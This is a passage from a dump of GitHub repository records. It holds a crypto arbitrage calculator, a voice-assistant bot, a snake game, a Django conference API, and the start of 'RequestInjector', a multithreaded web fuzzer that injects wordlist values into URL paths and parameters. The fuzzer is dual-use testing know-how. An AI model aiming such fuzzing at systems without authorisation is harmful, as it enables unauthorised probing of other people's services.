bt.namePri[k]\n #print(value_cur)\n else: continue;\n if(not(value_cur in bt_sent_cur)):\n continue;\n value = value - bt_fee[value_cur]\n temp_cur[2] = value_cur;\n temp_value[2] = value\n #--------------Send back to Bx-------------\n #print('d')\n for l in range(40):\n value=temp_value[2]\n if(temp_cur[2] == bx.namePri[l]):\n value = value/bx.priceSell[l] \n value_cur = bx.nameSec[l]\n temp_tradeA[3]=bx.namePri[l]\n temp_tradeB[3]=bx.nameSec[l]\n elif(temp_cur[2] == bx.nameSec[l]):\n value = value*bx.priceBuy[l]\n value_cur = bx.namePri[l]\n temp_tradeA[3]=bx.nameSec[l]\n temp_tradeB[3]=bx.namePri[l]\n else : continue\n temp_cur[3] = value_cur;\n temp_value[3] = value\n #print('e')\n for m in BTC_id:\n value = temp_value[3]\n if(temp_cur[3] == bx.nameSec[m]):\n value = value*bx.priceBuy[m]\n temp_tradeA[4]=bx.nameSec[m]\n temp_tradeB[4]=bx.namePri[m]\n value_cur=bx.namePri[m]\n temp_value[4] = value\n #print('zzz')\n print(f'Result money {value} Profit{value-money}')\n #print(\"THB > %s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n print(\" THB > %s/%s >|| %s/%s > %s/%s >|| %s/%s > %s/%s\"%(temp_tradeA[0],temp_tradeB[0],temp_tradeA[1],temp_tradeB[1],temp_tradeA[2],temp_tradeB[2],temp_tradeA[3],temp_tradeB[3],temp_tradeA[4],temp_tradeB[4]))\n #print(\"\")\n if(value > money):\n print(\"Result money %d Profit %d >> %s\" %(value,value-money,value_cur))\n print(\"%s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n profit.append(value-money)\n tradeRoute.append([ \"%s-%s\"%(temp_tradeA[0],temp_tradeB[0]) , \"%s-%s\"%(temp_tradeA[1],temp_tradeB[1]) ,\"%s-%s\"%(temp_tradeA[2],temp_tradeB[2]) ,\"%s-%s\"%(temp_tradeA[3],temp_tradeB[3]) ,\"%s-%s\"%(temp_tradeA[4],temp_tradeB[4]) ])\n self.profit = profit\n self.tradeRoute = tradeRoute\n print(\"End Route11\")\n\n'''class showRoute():\n def __init__():\n self.getIt()\n def getIt():\n bx = getBx()\n bt = getBittrex()\n Route = getRoute(bx,bt)'''\n\n\ndef getSentBt():\n sentDict = {};\n sentCur = []\n url = 'https://api.bittrex.com/api/v1.1/public/getcurrencies'\n r = requests.get(url)\n data = r.json()['result']\n \n for i in range(len(data)):\n cur = data[i]['Currency']\n fee = data[i]['TxFee']\n sentCur.append(cur)\n sentDict[cur] = fee\n return sentCur,sentDict\n\n# In[22]:\n\n\nbx_sent_cur = ['BTC','ETH','REP','BCH','BSV','XCN','DAS','DOG','EOS','EVX','FTC','GNO','HYP','LTC','NMC','OMG','PND','XPY','PPC','POW','XPM','XRP','ZEC','XZC','ZMN']\nbt_sent_cur = ['BTC','ETH','REP','BCH','BSV','DAS','DOG','DOGE','EOS','FTC','GNO','LTC','OMG','POW','XRP','ZEC','XZC']\nbt_fee = {'BTC':0.0005000,'ETH':0.0060000,'REP':0.1000000,'BCH':0.0010000,'BSV':0.00010000,'DAS':0.0500000,'DOG':2.0000000,'DOGE':2.0000000,'EOS':0.0200000,'FTC':0.2000000,'GNO':0.0200000,'LTC':0.0100000,'OMG':0.3500000,'POW':5.0000000,'XRP':1.0000000,'ZEC':0.0050000,'XZC':0.0200000}\nbx_fee = {'BTC':0.0005000,'ETH':0.0050000,'REP':0.0100000,'BCH':0.0001000,'BSV':0.00100000,'XCN':0.0100000,'DAS':0.0050000,'DOG':5.0000000,'EOS':0.0001000,'EVX':0.0100000,'FTC':0.0100000,'GNO':0.0100000,'HYP':0.0100000,'LTC':0.0050000,'NMC':0.0100000,'OMG':0.2000000,'PND':2.0000000,'XPY':0.0050000,'PPC':0.0200000,'POW':0.0100000,'XPM':0.0200000,'XRP':0.0100000,'ZEC':0.0050000,'XZC':0.0050000,'ZMN':0.0100000}\n#bt_sent_cur , bt_fee = getSentBt()\n#print(len(bt_sent_cur))\n"
}
] | 12 |
Rabie45/python_bot
|
https://github.com/Rabie45/python_bot
|
a6afe503a31e459077d2cd4f1f40b707a17c1dd2
|
6c49457d8d1f81ea648b366140828d6edfaf6a02
|
b7bb95f0750350cd4e1db4ca90ad8d5888ab2fe0
|
refs/heads/main
| 2023-04-20T09:45:18.942581 | 2021-05-07T20:42:42 | 2021-05-07T20:42:42 | 365,345,860 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5399296879768372,
"alphanum_fraction": 0.541436493396759,
"avg_line_length": 27.028169631958008,
"blob_id": "d2dd74a6cd5dd9d1e573d727c9de739b4ac7922b",
"content_id": "6b4df54b7a322e3e5a0e80370cd0d68689a1db58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1991,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 71,
"path": "/main.py",
"repo_name": "Rabie45/python_bot",
"src_encoding": "UTF-8",
"text": "\nimport speech_recognition as sr\nimport pyttsx3\nimport pywhatkit as pk\nimport pyjokes as pj\nimport wikipedia\nimport datetime as dt\nimport youtube_test\nimport takeLine\n\nlistener = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[1].id) #female sound\nmediaObj = ''\n\n\ndef talk(text):#say the string\n engine.say(text)\n engine.runAndWait()\n\n\ndef inti():\n while True:\n cmd = takeLine.take_comand(listener, sr) # take the commend from the mic\n if cmd is None:\n print('sleeping')\n pass\n elif cmd == 'how can i help u':\n talk(cmd)\n elif 'play' in cmd:\n song = cmd.replace('play ', '')\n print(song)\n linkSong = youtube_test.takeSong(song) # get the link\n mediaObj = youtube_test.URL(linkSong) # play\n print('playing ' + song)\n talk('playing ' + song)\n elif 'joke' in cmd: # tell me a joke\n joke = pj.get_joke()\n print(joke)\n talk(joke)\n elif 'who is' in cmd:\n name = cmd.replace('who is', '')\n info = wikipedia.summary(name)\n print(info)\n talk(info)\n elif 'time' in cmd:\n time = dt.datetime.now().strftime('%I:%M %p')\n talk(' the time is ' + time)\n elif 'stop' in cmd:\n mediaObj.stop()\n elif 'pause' in cmd:\n mediaObj.pause()\n elif 'continue' in cmd:\n mediaObj.play()\n elif 'volume up' in cmd:\n a = mediaObj.audio_get_volume()\n print(a)\n youtube_test.volumeUp(mediaObj, a)\n elif 'volume down' in cmd:\n a = mediaObj.audio_get_volume()\n print(a)\n youtube_test.volumeDown(mediaObj, a)\n\n elif 'mute' in cmd:\n youtube_test.mute(mediaObj)\n # youtube_test.volume_up(mediaObj)\n else:\n print('fine')\n\n\ninti()\n"
},
{
"alpha_fraction": 0.5635294318199158,
"alphanum_fraction": 0.567058801651001,
"avg_line_length": 27.366666793823242,
"blob_id": "8132d1fbd6b9640dcc7a2ded21c306b14efb2200",
"content_id": "fca0874bed85bd788c55be7cebab545fac7a65a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 850,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 30,
"path": "/takeLine.py",
"repo_name": "Rabie45/python_bot",
"src_encoding": "UTF-8",
"text": "import pyttsx3\nimport speech_recognition as sr\nlistener = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[1].id) #female sound\ndef take_comand(listener,sr):\n try:\n with sr.Microphone() as source:\n print('hmm,,,Iam hearing u')\n voice = listener.listen(source)\n command = listener.recognize_google(voice)\n print(command)\n if command == 'April':\n command = \"how can i help u\"\n return command\n elif 'April' in command:\n command = command.replace('April ', '')\n return command\n\n else:\n print('i can hear u')\n\n\n\n except:\n print('I can hear u')\ndef talk(text):#say the string\n engine.say(text)\n engine.runAndWait()"
},
{
"alpha_fraction": 0.7697368264198303,
"alphanum_fraction": 0.7697368264198303,
"avg_line_length": 49.66666793823242,
"blob_id": "de0e44bd9fc48a8ed475e02ff65f35ed94cc1ad0",
"content_id": "2f1b0967ecc42409427e93a20241b1eff8856aa5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 3,
"path": "/README.md",
"repo_name": "Rabie45/python_bot",
"src_encoding": "UTF-8",
"text": "# python_bot\ncreate a python bot his name is \"april\"\nit is a bot to play videos from youtube gather information from wiki tell u a joke or say the time\n"
}
] | 3 |
Mahadev555/Hungry-Snake-Game-
|
https://github.com/Mahadev555/Hungry-Snake-Game-
|
47044712bfb392d9125deef32dd123cdbd9ff40e
|
b78bb6ca65133f75daedf57a330f2312bd5359b1
|
04fe57bdc5fa7ed3dd098f5f9862303a8f980603
|
refs/heads/main
| 2023-08-15T13:36:53.136993 | 2021-09-30T15:57:34 | 2021-09-30T15:57:34 | 412,129,462 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5313700437545776,
"alphanum_fraction": 0.5742637515068054,
"avg_line_length": 18.285715103149414,
"blob_id": "56436ac9b026a83bf892a84ce556da093dd7dc63",
"content_id": "2254e04672bce48e4f8722249c972be6dd1e0615",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1562,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 77,
"path": "/snake_game.py",
"repo_name": "Mahadev555/Hungry-Snake-Game-",
"src_encoding": "UTF-8",
"text": "from turtle import *\r\nimport turtle\r\nfrom random import randrange\r\nfrom freegames import square, vector\r\n\r\nwn = turtle.Screen()\r\nwn.title(\"snake game (mahadev)\")\r\nwn.bgcolor('black')\r\nwn.tracer(0)\r\n\r\nSnake = turtle.Turtle()\r\nSnake.color(\"black\")\r\nSnake.speed(0)\r\nSnake.penup()\r\nSnake.setpos(-140,200)\r\nSnake.write(\"HUNGRY SNAKE\", font=(\"Algerian\",30,\"bold\") )\r\nSnake.penup()\r\nSnake.hideturtle()\r\nSnake.screen.bgpic(\"s22.gif\")\r\n \r\n \r\n\r\nfood = vector(0, 0)\r\nsnake = [vector(10, 0)]\r\naim = vector(0, -10)\r\n\r\n \r\ndef change(x, y):\r\n \"Change snake direction.\"\r\n aim.x = x\r\n aim.y = y\r\n\r\ndef inside(head):\r\n \"return True if head inside boundaries.\"\r\n return -360< head.x < 345 and -290 < head.y < 290\r\n \r\n\r\ndef move():\r\n \"Move snake forward one segment.\"\r\n head = snake[-1].copy()\r\n head.move(aim)\r\n\r\n if not inside(head) or head in snake:\r\n print(\"GAME OVER\")\r\n square(head.x, head.y, 10,'red')\r\n update()\r\n return\r\n\r\n snake.append(head)\r\n\r\n if head == food:\r\n print('Snake:', len(snake))\r\n food.x = randrange(-15, 15) * 10\r\n food.y = randrange(-15, 15) * 10\r\n else:\r\n snake.pop(0)\r\n \r\n\r\n clear()\r\n\r\n for body in snake:\r\n square(body.x, body.y, 10, \"black\")\r\n\r\n square(food.x, food.y, 10, 'blue')\r\n update()\r\n ontimer(move, 150)\r\n\r\n\r\nhideturtle()\r\ntracer(False)\r\nlisten()\r\nonkey(lambda: change(10, 0), 'Right')\r\nonkey(lambda: change(-10, 0), 'Left')\r\nonkey(lambda: change(0, 10), 'Up')\r\nonkey(lambda: change(0, -10), 'Down')\r\nmove()\r\ndone()\r\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 21.5,
"blob_id": "0acc6e8fd051aa48c7e4447f4446361f6a56edfb",
"content_id": "d7ff46c98cc87128f88dc9573c73ff9daa7ebe69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Mahadev555/Hungry-Snake-Game-",
"src_encoding": "UTF-8",
"text": "# Hungry-Snake-Game-\nSnake game using python\n"
}
] | 2 |
CLTanuki/Interpro
|
https://github.com/CLTanuki/Interpro
|
d0c1b7c25580083ab681f4e79d82c4653f9a815b
|
9e585fe0d7c3b96f4a5e5195aa7c2b92c8930dc9
|
efe0e371dce9ea01ed24fe29e6473b177aa60318
|
refs/heads/master
| 2020-12-11T07:17:02.826125 | 2014-12-10T08:58:18 | 2014-12-10T08:58:18 | 27,551,339 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7061855792999268,
"alphanum_fraction": 0.7087628841400146,
"avg_line_length": 35.97618865966797,
"blob_id": "fce5d87e94766651457daaf2e11c967f26a9cfb7",
"content_id": "bf91569bc5eeb01816e8ca4c44f39683b55bb9c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1552,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 42,
"path": "/conf/models.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.utils.translation import ugettext as _\nfrom erp.enterprise.models import CorpObject\nfrom erp.directory.models import Person\n\n\nclass Report(models.Model):\n title = models.CharField(max_length=20)\n slug = models.SlugField()\n reporter = models.ForeignKey(Person)\n file = models.FileField()\n begins = models.DateField(verbose_name=_('Begins at'))\n ends = models.DateField(verbose_name=_('Ends at'))\n section = models.ForeignKey('Section', related_name='reports')\n index = models.SmallIntegerField()\n\n\nclass Section(models.Model):\n title = models.CharField(max_length=20)\n slug = models.SlugField()\n master = models.ForeignKey(Person)\n begins = models.DateField(verbose_name=_('Begins at'))\n ends = models.DateField(verbose_name=_('Ends at'))\n conf = models.ForeignKey('Conference', related_name='schedule')\n index = models.SmallIntegerField()\n\n\nclass Conference(models.Model):\n begins = models.DateField(verbose_name=_('Begins at'))\n ends = models.DateField(verbose_name=_('Ends at'))\n place = models.ForeignKey(CorpObject, verbose_name=_('Place'))\n orgs = models.ManyToManyField(Person, verbose_name=_('Managers'))\n thesis_rules = models.TextField(verbose_name=_('Thesis Rules'))\n\n def get_absolute_url(self):\n from django.core.urlresolvers import reverse\n return reverse('prj_item', args=[str(self.slug)])\n\n @property\n def serializer(self):\n from .serializers import ConferenceSerializer\n return ConferenceSerializer"
},
{
"alpha_fraction": 0.707563042640686,
"alphanum_fraction": 0.7126050591468811,
"avg_line_length": 28.649999618530273,
"blob_id": "46915a88783d00c00f47e73d1cbcbfc5668585c7",
"content_id": "4fa121e76b8bfbd5b5ae168466b63d1adc9bdd05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 595,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 20,
"path": "/conf/views.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom erp.planning.models import Project\nfrom django.views.generic import DetailView, View, ListView, TemplateView\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass ConfIndex(TemplateView):\n\n template_name = 'conf/index.html'\n\n\nclass ConfMain(DetailView):\n model = Project\n # template_name = 'conf/index.html'\n\n def get_context_data(self, **kwargs):\n context = super(ConfMain, self).get_context_data(**kwargs)\n context['confs'] = Project.objects.filter(item_type_id=17).values()# .filter(status=1)\n return context\n\n\n"
},
{
"alpha_fraction": 0.6662068963050842,
"alphanum_fraction": 0.6689655184745789,
"avg_line_length": 33.57143020629883,
"blob_id": "cf779deff3416cc7b4de8d75d51c8771a50f409d",
"content_id": "52aa57c4304a2b752aa7d9bd0da29ee51c31f914",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 21,
"path": "/conf/urls.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "__author__ = 'cltanuki'\nfrom django.conf.urls import patterns, include, url\nfrom rest_framework.routers import DefaultRouter\nfrom . import views, api\n\nrouter = DefaultRouter()\nrouter.register(r'report', api.ReportViewset)\nrouter.register(r'section', api.SectionViewSet)\nrouter.register(r'conf', api.ConfViewset)\n\nurlpatterns = patterns('',\n url(r'^$', views.ConfIndex.as_view(), name='conf_index'),\n # url(r'^(?P<slug>.+)/$', views.ConfMain.as_view(), name='conf_main'),\n # url(r'^(?P<slug>.+)/', include(item_patterns)),\n)\n# urlpatterns += i18n_patterns('',\n# url(_(r'^about/$'), about_views.main, name='about'),\n# url(_(r'^news/'), include(news_patterns, namespace='news')),\n# )\n\nurlpatterns += router.urls"
},
{
"alpha_fraction": 0.540606677532196,
"alphanum_fraction": 0.5430528521537781,
"avg_line_length": 37.566036224365234,
"blob_id": "1cdfdc96072192331390687d1f046f61f0f4a552",
"content_id": "e70c8b36d89ff20e6c5aa7b92aad63b093e8a77a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2044,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 53,
"path": "/conf/migrations/0001_initial.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('enterprise', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Conf',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('title', models.CharField(verbose_name='Title', max_length=20)),\n ('alias', models.CharField(unique=True, verbose_name='Alias', max_length=25)),\n ('date', models.DateField(verbose_name='Date')),\n ('schedule', models.TextField(verbose_name='Shedule')),\n ('thesis_rules', models.TextField(verbose_name='Thesis Rules')),\n ('orgs', models.ManyToManyField(to=settings.AUTH_USER_MODEL, verbose_name='Managers')),\n ('place', models.ForeignKey(to='enterprise.CorpObject', verbose_name='Place')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ConfMember',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('is_reporter', models.BooleanField(default=False, verbose_name='Reporter')),\n ('conf', models.ForeignKey(to='Conf.Conf')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Reports',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6992031931877136,
"alphanum_fraction": 0.6992031931877136,
"avg_line_length": 27.714284896850586,
"blob_id": "d1b33d91ae2e3800b7459cc732ceb7640424899d",
"content_id": "1ea5840fc0c7e4bba700a0d52ebb675a6ae7a966",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1004,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 35,
"path": "/conf/serializers.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "__author__ = 'cltanuki'\nfrom . import models\nfrom erp.planning.models import Project\nfrom rest_framework import serializers\n\n\nclass ReportSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = models.Report\n fields = ('title', 'slug', 'reporter', 'file', 'begins', 'ends', 'index')\n\n\nclass SectionSerializer(serializers.HyperlinkedModelSerializer):\n reports = ReportSerializer(many=True)\n\n class Meta:\n model = models.Section\n fields = ('title', 'slug', 'master', 'begins', 'ends', 'index', 'reports')\n\n\nclass ConfDataSerializer(serializers.HyperlinkedModelSerializer):\n schedule = SectionSerializer(many=True)\n place = serializers.HyperlinkedIdentityField(view_name='obj-detail')\n\n class Meta:\n model = models.Conference\n fields = ('begins', 'ends', 'orgs', 'thesis_rules', 'schedule')\n\n\nclass ConferenceSerializer(serializers.ModelSerializer):\n data = serializers.RelatedField()\n\n class Meta:\n model = Project"
},
{
"alpha_fraction": 0.7527405619621277,
"alphanum_fraction": 0.7551766037940979,
"avg_line_length": 29.44444465637207,
"blob_id": "3fb87ca0205bd5f2ac2e5924f2d305df7de5e256",
"content_id": "50d27112eabb513df81637c83c11e7a21b25b565",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 27,
"path": "/conf/api.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "__author__ = 'cltanuki'\nfrom rest_framework import viewsets\nfrom . import models, serializers\nfrom erp.planning.models import Project\n\n\nclass ReportViewset(viewsets.ModelViewSet):\n\n serializer_class = serializers.ReportSerializer\n queryset = models.Report.objects.all()\n\n\nclass SectionViewSet(viewsets.ModelViewSet):\n\n serializer_class = serializers.SectionSerializer\n queryset = models.Section.objects.all()\n\n\nclass ConfViewset(viewsets.ModelViewSet):\n\n serializer_class = serializers.ConferenceSerializer\n queryset = Project.objects.filter(item_type_id=22)\n\n def retrieve(self, request, *args, **kwargs):\n self.serializer_class = serializers.ConfDataSerializer\n self.queryset = models.Conference.objects.all()\n return super(ConfViewset, self).retrieve(request, *args, **kwargs)"
}
] | 6 |
bonifield/RequestInjector
|
https://github.com/bonifield/RequestInjector
|
6159faeddb16de52c447ac2fc18edc293a9d7b8a
|
ec05331e5e7105c3d2a3fcc6629f587c1882d300
|
f8e6dc7c83a0d020c84929b5493e4560f2bc664d
|
refs/heads/main
| 2023-08-11T01:03:25.175753 | 2021-09-21T20:59:05 | 2021-09-21T20:59:05 | 397,393,453 | 3 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.9090909361839294,
"alphanum_fraction": 0.9090909361839294,
"avg_line_length": 43,
"blob_id": "ff8243464f3e71bb8ea611f9837a1335f7f4b66e",
"content_id": "d4e7a8a3ed5bb02533e17826443f7efc7333110b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 44,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 1,
"path": "/__init__.py",
"repo_name": "bonifield/RequestInjector",
"src_encoding": "UTF-8",
"text": "from requestinjector import RequestInjector\n"
},
{
"alpha_fraction": 0.7196261882781982,
"alphanum_fraction": 0.7196261882781982,
"avg_line_length": 18.545454025268555,
"blob_id": "6787e2ea0bbb0fc7ff8b6b77d6abb4337febd5db",
"content_id": "cf9551b891dfb55aa83965dc9e70aa3582236206",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 11,
"path": "/setup.py",
"repo_name": "bonifield/RequestInjector",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\n\nsetup(\n\tpy_modules=[\"requestinjector\"],\n\tentry_points={\n\t\t\"console_scripts\":[\n\t\t\t\"requestinjector = requestinjector:tool_entrypoint\",\n\t\t\t\"ri = requestinjector:tool_entrypoint\"\n\t\t]\n\t}\n)"
},
{
"alpha_fraction": 0.6545454263687134,
"alphanum_fraction": 0.6690575480461121,
"avg_line_length": 41.51914978027344,
"blob_id": "84eeb763e987f1013c402534be101b23b50c47ab",
"content_id": "e84d5bc3a13d4628d1e774128cca27893ff99855",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29975,
"license_type": "permissive",
"max_line_length": 424,
"num_lines": 705,
"path": "/requestinjector.py",
"repo_name": "bonifield/RequestInjector",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\n#=======================================================\n#\n#\tRequest Injector by Bonifield (https://github.com/bonifield)\n#\n#\tv0.9.4\n#\tLast Updated: 2021-09-21\n#\n#\tpath mode (-M path):\n#\t\t# NOTE - although -w accepts a comma-separated list of wordlists as a string, only the first one will be used for this mode\n#\t\t\trequestinjector.py -u \"http://example.com/somepath/a/b/c\" \\\n#\t\t\t-M path \\\n#\t\t\t-w \"/path/to/wordlist.txt\" \\\n#\t\t\t-t 10 \\\n#\t\t\t-r 2 \\\n#\t\t\t-m \\\n#\t\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n#\t\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n#\t\t\t--color\n#\n#\targ mode (-M arg) using shotgun attacktype (-T shotgun):\n#\t\t# NOTE - shotgun is similar to Burp Suite's sniper and battering ram modes; provide one or more keys, and a single wordlist\n#\t\t# NOTE - although -w accepts a comma-separated list of wordlists as a string, only the first one will be used for this attacktype\n#\t\t# NOTE - mutations (-m) not yet available for arg mode\n#\t\t\trequestinjector.py -u \"http://example.com/somepath/a/b/c\" \\\n#\t\t\t-M arg \\\n#\t\t\t-T shotgun \\\n#\t\t\t-K key1,key2,key3,key4 \\\n#\t\t\t-w \"/path/to/wordlist.txt\" \\\n#\t\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n#\t\t\t-t 10 \\\n#\t\t\t-r 2 \\\n#\t\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n#\t\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n#\t\t\t--color\n#\n#\targ mode (-M arg) using trident attacktype (-T trident), and optional static arguments (-S):\n#\t\t# NOTE - trident is similar to Burp Suite's pitchfork mode; for each key specified, provided a wordlist (-w WORDLIST1,WORDLIST2,etc); specify the same wordlist multiple times if using this attacktype and you want the same wordlist in multiple positions\n#\t\t# NOTE - this type will run through to the end of the shortest provided wordlist; use --longest and --fillvalue VALUE to run through the longest provided wordlist instead\n#\t\t# NOTE - mutations (-m) not yet available for arg mode\n#\t\t\trequestinjector.py -u \"http://example.com/somepath/a/b/c\" \\\n#\t\t\t-M arg \\\n#\t\t\t-T trident \\\n#\t\t\t-K key1,key2,key3,key4 \\\n#\t\t\t-w /path/to/wordlist1.txt,/path/to/wordlist2.txt,/path/to/wordlist3.txt,/path/to/wordlist4.txt \\\n#\t\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n#\t\t\t-t 10 \\\n#\t\t\t-r 2 \\\n#\t\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n#\t\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n#\t\t\t--color\n#\n#\targ mode (-M arg) using trident attacktype (-T trident), optional static arguments (-S), and --longest and --fillvalue VALUE (itertools.zip_longest())\n#\t\t# NOTE - trident is similar to Burp Suite's pitchfork mode; for each key specified, provided a wordlist (-w WORDLIST1,WORDLIST2,etc); specify the same wordlist multiple times if using this attacktype and you want the same wordlist in multiple positions\n#\t\t# NOTE - --longest and --fillvalue VALUE will run through to the end of the longest provided wordlist, filling empty values with the provided fillvalue\n#\t\t# NOTE - mutations (-m) not yet available for arg mode\n#\t\t\trequestinjector.py -u \"http://example.com/somepath/a/b/c\" \\\n#\t\t\t-M arg \\\n#\t\t\t-T trident \\\n#\t\t\t-K key1,key2,key3,key4 \\\n#\t\t\t-w /path/to/wordlist1.txt,/path/to/wordlist2.txt,/path/to/wordlist3.txt,/path/to/wordlist4.txt \\\n#\t\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n#\t\t\t--longest \\\n#\t\t\t--fillvalue \"AAAA\" \\\n#\t\t\t-t 10 \\\n#\t\t\t-r 2 \\\n#\t\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n#\t\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n#\t\t\t--color\n#\n#\toutput modes: full (default), --simple_output (just status code and full url), --color (same as simple_output but the status code is colorized)\n#\n#\tadditional options:\n#\t\t-d/--delay [FLOAT] = add a delay, per thread, as a float (default 0.0)\n#\n#\tor import as a module (from requestinjector import RequestInjector)\n#\n#=======================================================\n\nimport argparse\nimport itertools\nimport json\nimport os\nimport sys\nimport threading\nimport queue\nimport sys\nimport time\nfrom contextlib import ExitStack\nfrom pathlib import Path\nimport requests\nfrom urllib.parse import urlparse\n# suppress warning\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\n\n#================================================\n#\n# Filler Classes\n#\n#================================================\n\n\n\nclass Filler(threading.Thread):\n\t\"\"\"provides the parent class to fill a queue with provided wordlists, key/value pairs, or other items as provided\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tthreading.Thread.__init__(self)\n\t\tself.setDaemon(True)\n\t\tself.name = threading.current_thread().name\n\t\tself.queue = kwargs.get(\"queue\")\n\t\tself.wordlist = kwargs.get(\"wordlist\") # a list of wordlist files\n\t\tself.attacktype = kwargs.get(\"attacktype\")\n\t\tself.staticargs = kwargs.get(\"staticargs\")\n\t\tself.injectkeys = kwargs.get(\"injectkeys\")\n\t\tself.longest = kwargs.get(\"longest\")\n\t\tself.fillvalue = kwargs.get(\"fillvalue\")\n\n\n\nclass PathFiller(Filler):\n\t\"\"\"fills the queue based on path mode requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef run(self):\n\t\t# self.wordlist is a list, and this mode only accepts the first wordlist\n\t\twith open(self.wordlist[0], \"r\") as f:\n\t\t\tfor line in f:\n\t\t\t\tline = str(line).strip()\n\t\t\t\tself.queue.put(line)\n#\t\t\t\tprint(f\"\\033[95m{self.name}\\033[0m placed {line} into queuein\") # purple\n\t\tf.close()\n\n\n\nclass ArgShotgunFiller(Filler):\n\t\"\"\"fills the queue based on arg mode + shotgun attacktype requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef makeArg(self, word):\n\t\tl = []\n\t\tfor i in self.injectkeys:\n\t\t\t# make into key=value 